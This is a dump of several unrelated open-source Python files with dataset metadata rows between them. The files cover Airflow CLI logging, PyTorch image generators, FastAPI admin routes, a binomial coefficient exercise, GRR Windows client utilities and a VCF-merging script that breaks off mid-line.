plot_dataset = databunch.train_ds if cfg.overfit_mode else databunch.valid_ds
plotter.make_debug_plots(plot_dataset, model, databunch.classes, output_dir)
if cfg.output_uri.startswith('s3://'):
sync_to_dir(output_dir, cfg.output_uri)
if __name__ == '__main__':
train() | 37.04908 | 94 | 0.688028 |
4a1e57a062b4bb92b933636cacd35d81e6f8a6a3 | 4,171 | py | Python | airflow/utils/cli.py | abhishek-ch/incubator-airflow | 3358551c8e73d9019900f7a85f18ebfd88591450 | [
"Apache-2.0"
] | 4 | 2015-11-12T10:58:54.000Z | 2017-08-05T06:41:36.000Z | airflow/utils/cli.py | abhishek-ch/incubator-airflow | 3358551c8e73d9019900f7a85f18ebfd88591450 | [
"Apache-2.0"
] | 9 | 2016-01-14T18:06:48.000Z | 2018-10-02T16:32:51.000Z | airflow/utils/cli.py | abhishek-ch/incubator-airflow | 3358551c8e73d9019900f7a85f18ebfd88591450 | [
"Apache-2.0"
] | 2 | 2015-12-14T11:38:49.000Z | 2018-03-26T15:03:07.000Z | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""
Utilities module for cli
"""
from __future__ import absolute_import
import functools
import getpass
import json
import socket
import sys
from argparse import Namespace
from datetime import datetime
import airflow.models
from airflow.utils import cli_action_loggers
def action_logging(f):
"""
Decorates function to execute function at the same time submitting action_logging
but in CLI context. It will call action logger callbacks twice,
one for pre-execution and the other one for post-execution.
Action logger will be called with below keyword parameters:
sub_command : name of sub-command
start_datetime : start datetime instance by utc
end_datetime : end datetime instance by utc
full_command : full command line arguments
user : current user
log : airflow.models.Log ORM instance
dag_id : dag id (optional)
task_id : task_id (optional)
execution_date : execution date (optional)
error : exception instance if there's an exception
:param f: function instance
:return: wrapped function
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
An wrapper for cli functions. It assumes to have Namespace instance
at 1st positional argument
:param args: Positional argument. It assumes to have Namespace instance
at 1st positional argument
:param kwargs: A passthrough keyword argument
"""
assert args
assert isinstance(args[0], Namespace), \
"1st positional argument should be argparse.Namespace instance, " \
"but {}".format(args[0])
metrics = _build_metrics(f.__name__, args[0])
cli_action_loggers.on_pre_execution(**metrics)
try:
return f(*args, **kwargs)
except Exception as e:
metrics['error'] = e
raise
finally:
metrics['end_datetime'] = datetime.utcnow()
cli_action_loggers.on_post_execution(**metrics)
return wrapper
def _build_metrics(func_name, namespace):
"""
Builds metrics dict from function args
It assumes that function arguments is from airflow.bin.cli module's function
and has Namespace instance where it optionally contains "dag_id", "task_id",
and "execution_date".
:param func_name: name of function
:param namespace: Namespace instance from argparse
:return: dict with metrics
"""
metrics = {'sub_command': func_name}
metrics['start_datetime'] = datetime.utcnow()
metrics['full_command'] = '{}'.format(list(sys.argv))
metrics['user'] = getpass.getuser()
assert isinstance(namespace, Namespace)
tmp_dic = vars(namespace)
metrics['dag_id'] = tmp_dic.get('dag_id')
metrics['task_id'] = tmp_dic.get('task_id')
metrics['execution_date'] = tmp_dic.get('execution_date')
metrics['host_name'] = socket.gethostname()
extra = json.dumps(dict((k, metrics[k]) for k in ('host_name', 'full_command')))
log = airflow.models.Log(
event='cli_{}'.format(func_name),
task_instance=None,
owner=metrics['user'],
extra=extra,
task_id=metrics.get('task_id'),
dag_id=metrics.get('dag_id'),
execution_date=metrics.get('execution_date'))
metrics['log'] = log
return metrics
| 34.758333 | 85 | 0.686166 |
4a1e58c1c0de2e7ffa5b90d81b1ff5ff32677e8e | 7,968 | py | Python | models.py | Sriram-Ravula/CLIP_Decoder | 33e07cee1fa1cc41395b8cd027b8e24222ef59e3 | [
"MIT"
] | 2 | 2021-06-04T17:39:46.000Z | 2022-03-26T02:55:01.000Z | models.py | Sriram-Ravula/CLIP_Decoder | 33e07cee1fa1cc41395b8cd027b8e24222ef59e3 | [
"MIT"
] | null | null | null | models.py | Sriram-Ravula/CLIP_Decoder | 33e07cee1fa1cc41395b8cd027b8e24222ef59e3 | [
"MIT"
] | null | null | null | import torch.nn as nn
from non_local import NLBlockND
class Generator(nn.Module):
def __init__(self, ngf, nz, nc = 3):
super(Generator, self).__init__()
self.ngf = ngf
self.nz = nz
self.nc = nc
first_chans = nz // 49 + 1 #The number of channels to reshape the input code to
#First project the [N, nz] tensor to [N, 7*7*first_chans]
self.project = nn.Linear(in_features=nz, out_features=7*7*first_chans, bias=False)
#Here we must reshape the tensor to [N, first_chans, 7, 7]
self.deepen = nn.Conv2d(first_chans, ngf * 16, kernel_size=1, stride=1, padding=0, bias=False)
self.main = nn.Sequential(
#Input: [N, ngf * 16, 7, 7]
nn.ConvTranspose2d(ngf * 16, ngf * 8, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(ngf * 8),
nn.ReLU(),
#Input: [N, ngf * 8, 14, 14]
nn.ConvTranspose2d(ngf * 8, ngf * 4, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(ngf * 4),
nn.ReLU(),
#Input: [N, ngf * 4, 28, 28]
nn.ConvTranspose2d(ngf * 4, ngf* 2, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(ngf * 2),
nn.ReLU(),
#Input: [N, ngf * 2, 56, 56]
nn.ConvTranspose2d(ngf * 2, ngf, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(ngf),
nn.ReLU(),
#Input: [N, ngf, 112, 112]
nn.ConvTranspose2d(ngf, nc, kernel_size=4, stride=2, padding=1, bias=False)
#Output: [N, ngf, 224, 224]
)
def forward(self, x):
N = x.size(0)
x = self.project(x)
x = self.deepen(x.view(N, -1, 7, 7))
x = self.main(x)
return x
class Generator2(nn.Module):
def __init__(self, ngf, nz, nc = 3):
super(Generator2, self).__init__()
self.ngf = ngf
self.nz = nz
self.nc = nc
#input: [N, nz] --> reshape [N, nz, 1, 1]
#input: [N, nz, 1, 1] --> [N, 7*7* ngf*32, 1, 1]
#self.input = nn.Conv2d(nz, 7 * 7 * ngf*32, kernel_size=1, stride=1, padding=0, bias=False)
self.project = nn.Linear(in_features=nz, out_features=7*7*ngf*32, bias=False)
#input: [N, 7*7*ngf*32, 1, 1] --> reshape [N, ngf*32, 7, 7]
self.main = nn.Sequential(
#Input: [N, ngf * 32, 7, 7]
nn.BatchNorm2d(ngf * 32),
nn.ReLU(),
#Input: [N, ngf * 32, 7, 7]
nn.Conv2d(ngf * 32, ngf * 16, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(ngf * 16),
nn.ReLU(),
nn.Upsample(scale_factor=2),
#Input: [N, ngf * 16, 14, 14]
nn.Conv2d(ngf * 16, ngf * 8, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(ngf * 8),
nn.ReLU(),
nn.Upsample(scale_factor=2),
#Input: [N, ngf * 8, 28, 28]
nn.Conv2d(ngf * 8, ngf* 4, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(ngf * 4),
nn.ReLU(),
nn.Upsample(scale_factor=2),
#Input: [N, ngf * 4, 56, 56]
nn.Conv2d(ngf * 4, ngf * 2, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(ngf * 2),
nn.ReLU(),
nn.Upsample(scale_factor=2),
#Input: [N, ngf * 2, 112, 112]
nn.Conv2d(ngf * 2, ngf, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(ngf),
nn.ReLU(),
nn.Upsample(scale_factor=2),
#Input: [N, ngf, 224, 224]
nn.Conv2d(ngf, nc, kernel_size=3, stride=1, padding=1, bias=False),
nn.Tanh()
#Output: [N, nc, 224, 224]
)
def forward(self, x):
N = x.size(0)
#x = self.input(x.view(N, -1, 1, 1))
x = self.project(x)
x = self.main(x.view(N, -1, 7, 7))
return x
#Does Conv(Relu(BN(Conv(UP(Relu(BN(x))))))) + UP(x)
class ResBlockGenerator(nn.Module):
def __init__(self, in_channels, out_channels, stride=1):
super(ResBlockGenerator, self).__init__()
self.conv1 = nn.Conv2d(in_channels, out_channels, 3, 1, padding=1)
self.conv2 = nn.Conv2d(out_channels, out_channels, 3, 1, padding=1)
nn.init.xavier_uniform(self.conv1.weight.data, 1.)
nn.init.xavier_uniform(self.conv2.weight.data, 1.)
self.model = nn.Sequential(
nn.BatchNorm2d(in_channels),
nn.ReLU(),
nn.Upsample(scale_factor=2),
self.conv1,
nn.BatchNorm2d(out_channels),
nn.ReLU(),
self.conv2
)
residual = []
if stride != 1:
residual += [nn.Upsample(scale_factor=2)]
if in_channels != out_channels:
residual += [nn.Conv2d(in_channels, out_channels, 1, 1, padding=0)]
self.bypass = nn.Sequential(*residual)
def forward(self, x):
return self.model(x) + self.bypass(x)
class ResnetGenerator(nn.Module):
def __init__(self, nz, ngf, nc=3):
super(ResnetGenerator, self).__init__()
self.nz = nz
self.ngf = ngf
#Expect [N, nz] --> [N, 7 * 7 * ngf*32]
self.dense = nn.Linear(self.nz, 7 * 7 * 32*ngf)
#Expect [N, ngf, 224, 224] --> [N, 3, 224, 224]
self.final = nn.Conv2d(ngf, nc, 3, stride=1, padding=1)
nn.init.xavier_uniform(self.dense.weight.data, 1.)
nn.init.xavier_uniform(self.final.weight.data, 1.)
self.model = nn.Sequential(
#Input: [32*ngf, 7, 7]
ResBlockGenerator(32*ngf, 16*ngf, stride=2),
#Input: [16*ngf, 14, 14]
ResBlockGenerator(16*ngf, 8*ngf, stride=2),
#Input: [8*ngf, 28, 28]
ResBlockGenerator(8*ngf, 4*ngf, stride=2),
#Input: [4*ngf, 56, 56]
#NLBlockND(in_channels=4*ngf, dimension=2),
ResBlockGenerator(4*ngf, 2*ngf, stride=2),
#Input: [2*ngf, 112, 112]
ResBlockGenerator(2*ngf, ngf, stride=2),
#Input: [ngf, 224, 224]
nn.BatchNorm2d(ngf),
nn.ReLU(),
self.final,
#Input: [3, 224, 224]
nn.Tanh())
def forward(self, z):
N = z.size(0)
x = self.dense(z)
return self.model(x.view(N, -1, 7, 7))
class ResnetGenerator_small(nn.Module):
def __init__(self, nz, ngf, nc=3):
super(ResnetGenerator_small, self).__init__()
self.nz = nz
self.ngf = ngf
#Expect [N, nz] --> [N, 4 * 4 * ngf*16]
self.dense = nn.Linear(self.nz, 4 * 4 * 16*ngf)
#Expect [N, ngf, 224, 224] --> [N, 3, 224, 224]
self.final = nn.Conv2d(ngf, nc, 3, stride=1, padding=1)
nn.init.xavier_uniform(self.dense.weight.data, 1.)
nn.init.xavier_uniform(self.final.weight.data, 1.)
self.model = nn.Sequential(
#Input: [16*ngf, 4, 4]
ResBlockGenerator(16*ngf, 8*ngf, stride=2),
#Input: [8*ngf, 8, 8]
ResBlockGenerator(8*ngf, 4*ngf, stride=2),
#Input: [4*ngf, 16, 16]
ResBlockGenerator(4*ngf, 2*ngf, stride=2),
#Input: [2*ngf, 32, 32]
NLBlockND(in_channels=2*ngf, dimension=2),
ResBlockGenerator(2*ngf, ngf, stride=2),
#Input: [ngf, 64, 64]
nn.BatchNorm2d(ngf),
nn.ReLU(),
self.final,
#Input: [3, 64, 64]
nn.Tanh())
def forward(self, z):
N = z.size(0)
x = self.dense(z)
return self.model(x.view(N, -1, 4, 4))
| 32.92562 | 102 | 0.507781 |
4a1e58c998353f10f30995d425a978cd90b2eea7 | 1,787 | py | Python | src/gateau_api/routers/admin_authed.py | k2bd/gateau-api | b7fb1db8a9b6346b3ee7ebf4500d923996990e8b | [
"MIT"
] | null | null | null | src/gateau_api/routers/admin_authed.py | k2bd/gateau-api | b7fb1db8a9b6346b3ee7ebf4500d923996990e8b | [
"MIT"
] | 12 | 2022-02-03T20:36:05.000Z | 2022-03-27T11:29:06.000Z | src/gateau_api/routers/admin_authed.py | k2bd/gateau-api | b7fb1db8a9b6346b3ee7ebf4500d923996990e8b | [
"MIT"
] | null | null | null | """
Routes that you need to be logged in to use
"""
import logging
from typing import List
from fastapi import APIRouter, Depends
from firebase_admin import auth
from gateau_api.dependencies import get_user_uid
from gateau_api.dependencies.service import get_service
from gateau_api.dependencies.user import require_admin
from gateau_api.firebase import firebase_init_app
from gateau_api.service import GateauFirebaseService
from gateau_api.types import FirebaseUser, PokemonAvatar
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
router = APIRouter(
dependencies=[
Depends(get_user_uid),
Depends(require_admin),
]
)
firebase_init_app()
@router.get("/admin/users", response_model=List[FirebaseUser])
async def get_users(
service: GateauFirebaseService = Depends(get_service),
):
# TODO: paginate
users = auth.list_users().iterate_all()
results = []
for user in users:
avatars = await service.get_avatars(user.uid)
results.append(
FirebaseUser(
uid=user.uid,
claims=user.custom_claims,
display_name=user.display_name,
photo_url=user.photo_url,
email=user.email,
avatars=avatars,
)
)
return results
@router.post("/admin/avatar")
async def grant_avatar(
userId: str,
avatar: PokemonAvatar,
service: GateauFirebaseService = Depends(get_service),
):
await service.grant_avatar(user_id=userId, avatar=avatar)
@router.delete("/admin/avatar")
async def revoke_avatar(
userId: str,
avatar: PokemonAvatar,
service: GateauFirebaseService = Depends(get_service),
):
await service.revoke_avatar(user_id=userId, target_avatar=avatar)
| 24.819444 | 69 | 0.705652 |
4a1e59700d52c988a0846ccb63714f3e5423a759 | 903 | py | Python | ex19_1.py | DexHunter/Think-Python-book-exercise-solutions | d0abae261eda1dca99043e17e8a1e614caad2140 | [
"CC-BY-4.0"
] | 24 | 2019-05-07T15:11:28.000Z | 2022-03-02T04:50:28.000Z | ex19_1.py | Dekzu/Think-Python-book-exercise-solutions | d0abae261eda1dca99043e17e8a1e614caad2140 | [
"CC-BY-4.0"
] | null | null | null | ex19_1.py | Dekzu/Think-Python-book-exercise-solutions | d0abae261eda1dca99043e17e8a1e614caad2140 | [
"CC-BY-4.0"
] | 19 | 2019-08-05T20:59:04.000Z | 2022-03-07T05:13:32.000Z | def binomial_coeff(n, k):
'''Compute the binomial coefficient
n: number of trials
k: number of successes
returns: int
'''
if k==0:
return 1
if n==0:
return 0
res = binomial_coeff(n-1, k) + binomial_coeff(n-1, k-1)
return res
def b(n,k):
'''rewrite the function in a compact way
I failed to rewrite in conditional expression. :/
But this is the end of the course so meh. never mind
'''
memo = {}
if (n,k) in memo:
return memo[(n,k)]
if k==0:
return 1
if n==0:
return 0
r = b(n-1, k) + b(n-1, k-1)
memo[(n,k)] = r
return r
if __name__ == '__main__':
a = binomial_coeff(3,4)
# b(3,4) = b(2, 4) + b(2,3)
# b(2,4) = b(1,4) + b(1,3)
# b(1,4) = b(0,4) + b(0,3) = 0 + 0 = 0
# b(1,3) = b(0,3) + b(0,2) = 0 + 0 = 0
# b(2,3) = b(1,3) + b(1,2)
# b(1,2) = b(0,2) + b(0,1) = 0 + 0 = 0
print(a)
print(b(3,4))
c = binomial_coeff(10,4)
print(c)
print(b(10,4)) | 18.8125 | 56 | 0.545958 |
4a1e5a8405cd4fbe2e12131fc49aba8a2f400c23 | 12,973 | py | Python | grr/client/grr_response_client/client_utils_windows.py | nickamon/grr | ad1936c74728de00db90f6fafa47892b54cfc92d | [
"Apache-2.0"
] | null | null | null | grr/client/grr_response_client/client_utils_windows.py | nickamon/grr | ad1936c74728de00db90f6fafa47892b54cfc92d | [
"Apache-2.0"
] | 1 | 2018-05-08T21:15:51.000Z | 2018-05-08T21:15:51.000Z | grr/client/grr_response_client/client_utils_windows.py | nickamon/grr | ad1936c74728de00db90f6fafa47892b54cfc92d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""Windows specific utils."""
import ctypes
import exceptions
import logging
import os
import re
import time
import _winreg
import ntsecuritycon
import pywintypes
import win32api
import win32file
import win32security
from google.protobuf import message
from grr import config
from grr_response_client.windows import process
from grr.lib import utils
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import paths as rdf_paths
DACL_PRESENT = 1
DACL_DEFAULT = 0
def CanonicalPathToLocalPath(path):
r"""Converts the canonical paths as used by GRR to OS specific paths.
Due to the inconsistencies between handling paths in windows we need to
convert a path to an OS specific version prior to using it. This function
should be called just before any OS specific functions.
Canonical paths on windows have:
- / instead of \.
- Begin with /X:// where X is the drive letter.
Args:
path: A canonical path specification.
Returns:
A windows specific path.
"""
# Account for raw devices
path = path.replace("/\\", "\\")
path = path.replace("/", "\\")
m = re.match(r"\\([a-zA-Z]):(.*)$", path)
if m:
path = "%s:\\%s" % (m.group(1), m.group(2).lstrip("\\"))
return path
def LocalPathToCanonicalPath(path):
"""Converts path from the local system's convention to the canonical."""
path_components = path.split("/")
result = []
for component in path_components:
# Devices must maintain their \\ so they do not get broken up.
m = re.match(r"\\\\.\\", component)
# The component is not special and can be converted as normal
if not m:
component = component.replace("\\", "/")
result.append(component)
return utils.JoinPath(*result)
def WinChmod(filename, acl_list, user=None):
"""Provide chmod-like functionality for windows.
Doco links:
goo.gl/n7YR1
goo.gl/rDv81
goo.gl/hDobb
Args:
filename: target filename for acl
acl_list: list of ntsecuritycon acl strings to be applied with bitwise OR.
e.g. ["FILE_GENERIC_READ", "FILE_GENERIC_WRITE"]
user: username string. If not specified we use the user we are running as.
Raises:
AttributeError: if a bad permission is passed
RuntimeError: if filename doesn't exist
"""
if user is None:
user = win32api.GetUserName()
if not os.path.exists(filename):
raise RuntimeError("filename %s does not exist" % filename)
acl_bitmask = 0
for acl in acl_list:
acl_bitmask |= getattr(ntsecuritycon, acl)
dacl = win32security.ACL()
win_user, _, _ = win32security.LookupAccountName("", user)
dacl.AddAccessAllowedAce(win32security.ACL_REVISION, acl_bitmask, win_user)
security_descriptor = win32security.GetFileSecurity(
filename, win32security.DACL_SECURITY_INFORMATION)
# Tell windows to set the acl and mark it as explicitly set
security_descriptor.SetSecurityDescriptorDacl(DACL_PRESENT, dacl,
DACL_DEFAULT)
win32security.SetFileSecurity(
filename, win32security.DACL_SECURITY_INFORMATION, security_descriptor)
def VerifyFileOwner(filename):
"""Verifies that <filename> is owned by the current user."""
# On Windows server OSs, files created by users in the
# Administrators group will be owned by Administrators instead of
# the user creating the file so this check won't work. Since on
# Windows GRR uses its own temp directory inside the installation
# dir, whenever someone can modify that dir it's already game over
# so this check doesn't add much.
del filename
return True
def FindProxies():
"""Tries to find proxies by interrogating all the user's settings.
This function is a modified urillib.getproxies_registry() from the
standard library. We just store the proxy value in the environment
for urllib to find it.
TODO(user): Iterate through all the possible values if one proxy
fails, in case more than one proxy is specified in different users
profiles.
Returns:
A list of proxies.
"""
proxies = []
for i in range(0, 100):
try:
sid = _winreg.EnumKey(_winreg.HKEY_USERS, i)
except exceptions.WindowsError:
break
try:
subkey = (
sid + "\\Software\\Microsoft\\Windows"
"\\CurrentVersion\\Internet Settings")
internet_settings = _winreg.OpenKey(_winreg.HKEY_USERS, subkey)
proxy_enable = _winreg.QueryValueEx(internet_settings, "ProxyEnable")[0]
if proxy_enable:
# Returned as Unicode but problems if not converted to ASCII
proxy_server = str(
_winreg.QueryValueEx(internet_settings, "ProxyServer")[0])
if "=" in proxy_server:
# Per-protocol settings
for p in proxy_server.split(";"):
protocol, address = p.split("=", 1)
# See if address has a type:// prefix
if not re.match("^([^/:]+)://", address):
address = "%s://%s" % (protocol, address)
proxies.append(address)
else:
# Use one setting for all protocols
if proxy_server[:5] == "http:":
proxies.append(proxy_server)
else:
proxies.append("http://%s" % proxy_server)
internet_settings.Close()
except (exceptions.WindowsError, ValueError, TypeError):
continue
logging.debug("Found proxy servers: %s", proxies)
return proxies
def GetRawDevice(path):
"""Resolves the raw device that contains the path.
Args:
path: A path to examine.
Returns:
A pathspec to read the raw device as well as the modified path to read
within the raw device. This is usually the path without the mount point.
Raises:
IOError: if the path does not exist or some unexpected behaviour occurs.
"""
path = CanonicalPathToLocalPath(path)
# Try to expand the shortened paths
try:
path = win32file.GetLongPathName(path)
except pywintypes.error:
pass
try:
mount_point = win32file.GetVolumePathName(path)
except pywintypes.error as details:
logging.info("path not found. %s", details)
raise IOError("No mountpoint for path: %s", path)
if not path.startswith(mount_point):
stripped_mp = mount_point.rstrip("\\")
if not path.startswith(stripped_mp):
raise IOError("path %s is not mounted under %s" % (path, mount_point))
corrected_path = LocalPathToCanonicalPath(path[len(mount_point):])
corrected_path = utils.NormalizePath(corrected_path)
volume = win32file.GetVolumeNameForVolumeMountPoint(mount_point).rstrip("\\")
volume = LocalPathToCanonicalPath(volume)
# The pathspec for the raw volume
result = rdf_paths.PathSpec(
path=volume,
pathtype=rdf_paths.PathSpec.PathType.OS,
mount_point=mount_point.rstrip("\\"))
return result, corrected_path
class NannyController(object):
"""Controls communication with the nanny."""
_service_key = None
synced = True
def _GetKey(self):
"""Returns the service key."""
if self._service_key is None:
hive = getattr(_winreg, config.CONFIG["Nanny.service_key_hive"])
path = config.CONFIG["Nanny.service_key"]
# Don't use _winreg.KEY_WOW64_64KEY since it breaks on Windows 2000
self._service_key = _winreg.CreateKeyEx(hive, path, 0,
_winreg.KEY_ALL_ACCESS)
return self._service_key
def Heartbeat(self):
"""Writes a heartbeat to the registry."""
try:
_winreg.SetValueEx(self._GetKey(), "Nanny.heartbeat", 0,
_winreg.REG_DWORD, int(time.time()))
except exceptions.WindowsError, e:
logging.debug("Failed to heartbeat nanny at %s: %s",
config.CONFIG["Nanny.service_key"], e)
def WriteTransactionLog(self, grr_message):
"""Write the message into the transaction log.
Args:
grr_message: A GrrMessage instance.
"""
grr_message = grr_message.SerializeToString()
try:
_winreg.SetValueEx(self._GetKey(), "Transaction", 0, _winreg.REG_BINARY,
grr_message)
NannyController.synced = False
except exceptions.WindowsError:
pass
def SyncTransactionLog(self):
if not NannyController.synced:
_winreg.FlushKey(self._GetKey())
NannyController.synced = True
def CleanTransactionLog(self):
"""Wipes the transaction log."""
try:
_winreg.DeleteValue(self._GetKey(), "Transaction")
NannyController.synced = False
except exceptions.WindowsError:
pass
def GetTransactionLog(self):
"""Return a GrrMessage instance from the transaction log or None."""
try:
value, reg_type = _winreg.QueryValueEx(self._GetKey(), "Transaction")
except exceptions.WindowsError:
return
if reg_type != _winreg.REG_BINARY:
return
try:
return rdf_flows.GrrMessage.FromSerializedString(value)
except message.Error:
return
def GetNannyStatus(self):
try:
value, _ = _winreg.QueryValueEx(self._GetKey(), "Nanny.status")
except exceptions.WindowsError:
return None
return value
def GetNannyMessage(self):
try:
value, _ = _winreg.QueryValueEx(self._GetKey(), "Nanny.message")
except exceptions.WindowsError:
return None
return value
def ClearNannyMessage(self):
"""Wipes the nanny message."""
try:
_winreg.DeleteValue(self._GetKey(), "Nanny.message")
NannyController.synced = False
except exceptions.WindowsError:
pass
def StartNanny(self):
"""Not used for the Windows nanny."""
def StopNanny(self):
"""Not used for the Windows nanny."""
class Kernel32(object):
_kernel32 = None
def __init__(self):
if not Kernel32._kernel32:
Kernel32._kernel32 = ctypes.windll.LoadLibrary("Kernel32.dll")
@property
def kernel32(self):
return self._kernel32
def KeepAlive():
es_system_required = 0x00000001
kernel32 = Kernel32().kernel32
kernel32.SetThreadExecutionState(ctypes.c_int(es_system_required))
def RtlGetVersion(os_version_info_struct):
"""Wraps the lowlevel RtlGetVersion routine.
Args:
os_version_info_struct: instance of either a RTL_OSVERSIONINFOW structure
or a RTL_OSVERSIONINFOEXW structure,
ctypes.Structure-wrapped, with the
dwOSVersionInfoSize field preset to
ctypes.sizeof(self).
Raises:
WindowsError: if the underlaying routine fails.
See: https://msdn.microsoft.com/en-us/library/
windows/hardware/ff561910(v=vs.85).aspx .
"""
rc = ctypes.windll.Ntdll.RtlGetVersion(ctypes.byref(os_version_info_struct))
if rc != 0:
raise exceptions.WindowsError("Getting Windows version failed.")
class RtlOSVersionInfoExw(ctypes.Structure):
"""Wraps the lowlevel RTL_OSVERSIONINFOEXW struct.
See: https://msdn.microsoft.com/en-us/library/
windows/hardware/ff563620(v=vs.85).aspx .
"""
_fields_ = [("dwOSVersionInfoSize", ctypes.c_ulong), ("dwMajorVersion",
ctypes.c_ulong),
("dwMinorVersion",
ctypes.c_ulong), ("dwBuildNumber",
ctypes.c_ulong), ("dwPlatformId",
ctypes.c_ulong),
("szCSDVersion",
ctypes.c_wchar * 128), ("wServicePackMajor",
ctypes.c_ushort), ("wServicePackMinor",
ctypes.c_ushort),
("wSuiteMask", ctypes.c_ushort), ("wProductType",
ctypes.c_byte), ("wReserved",
ctypes.c_byte)]
def __init__(self, **kwargs):
kwargs["dwOSVersionInfoSize"] = ctypes.sizeof(self)
super(RtlOSVersionInfoExw, self).__init__(**kwargs)
def KernelVersion():
"""Gets the kernel version as string, eg. "5.1.2600".
Returns:
The kernel version, or "unknown" in the case of failure.
"""
rtl_osversioninfoexw = RtlOSVersionInfoExw()
try:
RtlGetVersion(rtl_osversioninfoexw)
except exceptions.WindowsError:
return "unknown"
return "%d.%d.%d" % (rtl_osversioninfoexw.dwMajorVersion,
rtl_osversioninfoexw.dwMinorVersion,
rtl_osversioninfoexw.dwBuildNumber)
def GetExtAttrs(filepath):
"""Does nothing.
This is kept for compatibility with other platform-specific version of this
function.
Args:
filepath: Unused.
Returns:
An empty list.
"""
del filepath # Unused on Windows.
return []
def OpenProcessForMemoryAccess(pid=None):
return process.Process(pid=pid)
def MemoryRegions(proc, options):
for start, length in proc.Regions(
skip_special_regions=options.skip_special_regions):
yield start, length
| 29.152809 | 80 | 0.663147 |
4a1e5b812ffc515ba7602fa347e67023898a6a25 | 12,269 | py | Python | merge_vcf_files.py | martynaut/mirnome-mutations | 2bcee735a3620a0ae6fc91a57500f19b8851ff60 | [
"MIT"
] | null | null | null | merge_vcf_files.py | martynaut/mirnome-mutations | 2bcee735a3620a0ae6fc91a57500f19b8851ff60 | [
"MIT"
] | 1 | 2021-09-10T12:07:49.000Z | 2021-09-24T07:04:02.000Z | merge_vcf_files.py | martynaut/mirnome-mutations | 2bcee735a3620a0ae6fc91a57500f19b8851ff60 | [
"MIT"
] | null | null | null | import click
import gzip
import pandas as pd
import os
import shutil
from prepare_vcf_files_helpers import update_dict_with_file, change_format, change_info
pd.options.mode.chained_assignment = None
def make_unique_files(input_folder, output_folder, copy_input):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
else:
click.echo("Cleaning output folder")
for filename in os.listdir(output_folder):
file_path = os.path.join(output_folder, filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print('Failed to delete {}. Reason: {}'.format(file_path, e))
if not os.path.exists(output_folder + '/temp'):
os.makedirs(output_folder + '/temp')
files = [[x[0] + '/' + y for y in x[2]] for x in os.walk(input_folder)]
flat_files = [file for sublist in files for file in sublist]
gz_files = [file for file in flat_files if file.endswith('vcf.gz')]
if not gz_files:
print("No vcf.gz files in the directory")
return 1
dict_with_files = {}
for gz_file in gz_files:
dict_with_files = update_dict_with_file(gz_file, dict_with_files)
df_dict_with_files = pd.DataFrame.from_dict(dict_with_files, orient='index')
df_dict_with_files.index.name = 'filename'
df_dict_with_files.to_csv(output_folder + '/files_summary_before_merging.csv', sep=',')
df_dict_with_files_grouped = df_dict_with_files.reset_index().groupby(['indiv_name',
'type_of_file']).agg('nunique')
df_dict_with_files_grouped.to_csv(output_folder + '/files_summary_count_per_patient_before_merging.csv', sep=',')
df_not_unique_patients = df_dict_with_files_grouped.loc[df_dict_with_files_grouped['filename'] != 1, :]
df_not_unique_patients.to_csv(output_folder + '/not_unique_patients.csv', sep=',')
with open(output_folder+'/do_not_use.txt', 'w+') as do_not_use_file:
for patient in list(df_not_unique_patients.unstack().index.unique()):
this_patient = df_not_unique_patients.xs(patient, level=0)
for file_type in list(this_patient.index.unique()):
first = True
with open(output_folder + '/temp/' + patient+'_'+file_type+'.vcf', 'wb') as combined:
temp_df = df_dict_with_files.loc[(df_dict_with_files['indiv_name'] == patient) &
(df_dict_with_files['type_of_file'] == file_type), :]
lines_df = pd.DataFrame()
columns = []
for filename in list(temp_df.index.unique()):
print(filename)
do_not_use_file.write(filename+'\n')
with gzip.open(filename) as f:
for line in f.readlines():
dline = line.decode('ascii')
if dline.startswith('##') and first:
combined.write(line)
elif dline.startswith('##'):
pass
elif dline.startswith('#') and first:
combined.write(line)
columns = dline.replace('#', '').strip().split('\t')
elif dline.startswith('#'):
columns = dline.replace('#', '').strip().split('\t')
else:
new_record = \
pd.DataFrame([dline.replace('\n',
'').replace(';',
':').replace('"',
'').split('\t')],
columns=columns)
new_columns_normal = new_record['NORMAL'].str.split(":", expand=True)
normal_columns = list(map(lambda x: x + '_normal',
new_record['FORMAT'].str.strip().str.split(":").
values[0]))
try:
new_columns_normal.columns = normal_columns
except ValueError:
normal_columns.remove('SS_normal')
new_columns_normal.columns = normal_columns
new_record = pd.concat([new_record, new_columns_normal], axis=1)
new_columns_tumor = new_record['TUMOR'].str.split(":", expand=True)
tumor_columns = list(map(lambda x: x + '_tumor',
new_record['FORMAT'].str.strip().str.split(":").
values[0]))
new_columns_tumor.columns = tumor_columns
new_record = pd.concat([new_record, new_columns_tumor], axis=1)
lines_df = pd.concat([lines_df, new_record])
first = False
lines_df = lines_df[lines_df['FILTER'].str.contains('PASS')]
filter_columns = list(lines_df.columns)
filter_columns.remove('CHROM')
filter_columns.remove('POS')
filter_columns.remove('ID')
filter_columns.remove('REF')
filter_columns.remove('ALT')
filter_columns_names = list(set(list(map(lambda x: x.replace('_tumor', '').replace('_normal', ''),
